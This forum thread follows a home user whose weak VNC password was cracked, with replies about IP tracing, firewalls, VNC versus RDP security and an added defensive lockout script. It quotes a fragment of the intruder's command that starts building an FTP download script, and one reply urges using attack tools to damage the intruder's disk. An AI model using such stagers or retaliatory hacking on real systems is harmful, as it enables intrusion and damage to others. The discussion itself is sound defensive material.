Thread: Repeated hacking attempts

  1. #1
    Member Hired_goon's Avatar
    Long story short.

    Since storms last week broadband line is down.
    Using dialup at the moment.
    Using internet connection sharing to allow the missus access as well.

    To allow her to access internet I have to reduce firewall settings to medium.

    While on this setting some little bastard has cracked my VNC password and in the middle of my doing something the run dialog appears and tries to type shit like
    cmd.exe /c del i&echo open 127.0.0.1 33405 > i&echo
    That was all he typed before I cut him off. Had other similar ones that I didn't record.

    Now I have changed my VNC password and forced the access permissions to prompt me.

    But Windows Event Viewer does a real fine job of recording the IP of each access attempt; however, a trace shows no RDNS for each IP (different each time).

    So, my question is, with no RDNS is it likely to be proxied or spoofed?

    Would really like to fuck this guy up but am I wasting my time trying?

    Anybody got any good tracing tool recommendations? Currently using Sam Spade.

    Yea, I know, VNC sucks but in a house of five computers and one couch potato, it's damn handy.

    Suggestions???
    To be old and wise you must first be young and stupid.

    Quote Originally Posted by PSB Forum Software
    Sorry, no matter how much you try, you can not ignore yourself.

  2. #2
    Member TYSON's Avatar
    post the ip's
    My Turbo Build

    Thanks to Sponsors:
    Motorcycle Panel & Paint
    Q-Zar Fremantle
    Rated-R Parts
    PerthStreetBikes.com and it's generous members
    Carlisle Printing - Deals for PSB members
    CIC - Competition & Industrial Coatings
    Carpet Liquidators - Midland

  3. #3
    Member Hired_goon's Avatar
    Quote Originally Posted by TYSON
    post the ip's

    124.60.175.69
    220.89.37.42
    218.49.10.108

    These are the three from today.

  4. #4
    Member TYSON's Avatar
    124.60.175.69
    remarks: This address space is assigned at various other places in
    remarks: the world and might therefore not be in the RIPE database

    220.89.37.42
    remarks: This address space is assigned at various other places in
    remarks: the world and might therefore not be in the RIPE database

    218.49.10.108
    remarks: This address space is assigned at various other places in
    remarks: the world and might therefore not be in the RIPE database

    Judging by this http://www.google.com/search?hl=en&saf...amp;btnG=Search

    My guess is china

  5. #5
    Member Hired_goon's Avatar
    Cheers Tyson, pretty much the same brick wall I came up with.

    Just want to know if he's malicious or gonna load some porn on my comp for me free of charge.

  6. #6
    Member D'Artagnan's Avatar
    Spoofed IPs. Best bet is to force an IP change and do something about the firewall. Got a spare dual port dialup router if you want? ICS sucks.
    Remember half the cagers out there are below average drivers...

  7. #7
    Member Hired_goon's Avatar
    Quote Originally Posted by D'Artagnan
    Spoofed IPs. Best bet is to force an IP change and do something about the firewall. Got a spare dual port dialup router if you want? ICS sucks.

    Thanks Nessross, got plenty of gear to secure, just want my broadband back so I can get back to normal. Damn Telstra needs to do some recabling. Friday should be the day.

    Latest IP is 201.75.136.117 while I was out having a swim. Ahhh, feel cooler now. lol

  8. #8
    Member Absent-minded's Avatar
    www.astalavista.com you can get some good programs from there, and some ones that will, umm rape? the hacker basically backlashing them corrupting their HDD n shiznit

  9. #9
    Member Pkunk's Avatar
    I hope you are using a password that isn't susceptible to a dictionary/brute force attack...

  10. #10
    Member Absent-minded's Avatar
    Quote Originally Posted by Pkunk
    I hope you are using a password that isn't susceptible to a dictionary/brute force attack...

    Brute force like a brick by any chance?

  11. #11
    Member thro's Avatar
    Suggestion? Block everything, open up what you need, and be selective about where you allow those connections to come from.

    If you'd done that, the kiddie would have never even been able to connect to your VNC in the first place....


    However, as said, firewall on the machine you're trying to protect is false security - all it needs is for some virus/trojan to be accidentally downloaded that turns firewalling off or modifies the rules, etc and you're back to being insecure, get a router if you can


    And yeah... brute force = just guessing every possible password.... ALL passwords are susceptible to brute force... eventually, unless they start dropping failed connections and locking out logins....
    stuff
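
thro's two suggestions above (accept connections only from selected sources, and lock a source out after repeated failed logins) as an added Python example that is not part of the thread; the log format, the address ranges and the thresholds are assumptions made for the illustration.

```python
import ipaddress
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Hypothetical policy: only the home LAN may reach VNC, and a source is
# locked out for 15 minutes after 3 failures inside 60 seconds.
ALLOWED_NETS = [ipaddress.ip_network("192.168.0.0/24")]
MAX_FAILS, WINDOW, LOCKOUT = 3, timedelta(seconds=60), timedelta(minutes=15)
# Constructed sample log, "timestamp source result". The format is an
# assumption, not real VNC or Event Viewer output; 198.51.100.7 is a
# documentation address standing in for an internet source.
SAMPLE_LOG = """\
2007-01-10T14:00:00 198.51.100.7 fail
2007-01-10T14:00:05 192.168.0.12 fail
2007-01-10T14:00:10 192.168.0.12 fail
2007-01-10T14:00:15 192.168.0.12 fail
2007-01-10T14:00:20 192.168.0.12 ok
2007-01-10T14:20:00 192.168.0.12 ok
"""

def replay(log_text):
    """Return (source, decision) for each attempt, in log order."""
    fails = defaultdict(deque)   # source -> timestamps of recent failures
    locked_until = {}            # source -> time the lockout ends
    decisions = []
    for line in log_text.splitlines():
        stamp, source, result = line.split()
        now = datetime.fromisoformat(stamp)
        addr = ipaddress.ip_address(source)
        if not any(addr in net for net in ALLOWED_NETS):
            decision = "drop"        # default deny: never reaches the password check
        elif locked_until.get(source, now) > now:
            decision = "locked"      # even a correct password is refused
        elif result == "fail":
            recent = fails[source]
            recent.append(now)
            while now - recent[0] > WINDOW:
                recent.popleft()     # forget failures outside the window
            decision = "fail"
            if len(recent) >= MAX_FAILS:
                locked_until[source] = now + LOCKOUT
                recent.clear()
        else:
            fails.pop(source, None)  # success resets the failure count
            decision = "accept"
        decisions.append((source, decision))
    return decisions

if __name__ == "__main__":
    print(*replay(SAMPLE_LOG), sep="\n")
```

With the lockout in place a guesser gets three tries per quarter hour from any one allowed address, and an address outside the allowlist gets none.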

  12. #12
    Staff Klink's Avatar
    What version of windows are you running?

    If it's XP... get rid of Windows Firewall. I'm sorry but that is a piece of shit.
    If it's XP... get rid of VNC and use Remote Desktop Connection.

    If it's not XP... get with the times
    If you can... you MUST!

  13. #13
    Member Hired_goon's Avatar
    Quote Originally Posted by Klink
    What version of Windows are you running?

    If it's XP... get rid of Windows Firewall. I'm sorry but that is a piece of shit.
    If it's XP... get rid of VNC and use Remote Desktop Connection.

    If it's not XP... get with the times

    XP firewall dumped on day one
    Still got one win2k machine on my network so VNC still useful.

    And yes, the password was too easy but never had a problem before. All fixed now. It's just since my broadband is down. Normally between the ADSL modem's firewall and local firewalls on every machine there isn't much that can get through.

    The only problem is I can't seem to get my local firewall to allow access to the net using ICS without relaxing the settings a bit.

    Any Telstra people out there??? I WANT MY BLOODY PHONE LINE BACK!!!!!!!

  14. #14
    Member DaveR6's Avatar
    VNC is great. Why is Remote Desktop any more secure... especially if VNC is using your Windows logon to authenticate?

    Sounds like VNC bashing from those who don't understand how to configure it securely.

  15. #15
    Member TYSON's Avatar
    Quote Originally Posted by DaveR6
    VNC is great. Why is Remote Desktop any more secure... especially if VNC is using your Windows logon to authenticate?

    Sounds like VNC bashing from those who don't understand how to configure it securely.

    Any port open to the internet is a risk; correct configuration won't save you from an exploit, and looking at all the sploits that have been available for it I wouldn't leave it open.

  16. #16
    Staff Klink's Avatar
    Quote Originally Posted by DaveR6
    VNC is great. Why is Remote Desktop any more secure... especially if VNC is using your Windows logon to authenticate?

    Sounds like VNC bashing from those who don't understand how to configure it securely.

    LOL

    I didn't say it was insecure... I think it's horrible
    It's called an opinion.

    Nothing is 100% secure.

  17. #17
    Member D'Artagnan's Avatar
    While RDP is 'fixed' to 3389 it's compromised. Personally I think it looks better than VNC but I use VNC when working on remote sites, simply because of the increased security. Oh and I use UVnc SC http://www.uvnc.com/pchelpware/sc/index.html which not only allows custom encryption, but reduces the risk of breaches by being remote initiated. Not ideal for all, but better for me. What does this mean? Well, Joe Blow has an issue, I send him a file (pre-configured exe) which he runs. I then gain control of his PC. He can end it whenever and he has to initiate the connection. Only the port I want to open and it can't connect to anything but me.

    Nessross

  18. #18
    Staff Klink's Avatar
    RDP's port number can be changed by:
    1. Start Registry Editor.
    2. Locate and then click the following registry subkey:
      HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber
    3. On the Edit menu, click Modify, and then click Decimal.
    4. Type the new port number, and then click OK.
    5. Quit Registry Editor.

  19. #19
    Member D'Artagnan's Avatar
    Well there you go..really should have checked that, but it's been so long since I've needed to.

  20. #20
    Member Desmo's Avatar
    Quote Originally Posted by Klink
    RDP's port number can be changed by:
    1. Start Registry Editor.
    2. Locate and then click the following registry subkey:
      HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber
    3. On the Edit menu, click Modify, and then click Decimal.
    4. Type the new port number, and then click OK.
    5. Quit Registry Editor.

    Just don't set it to port 80....
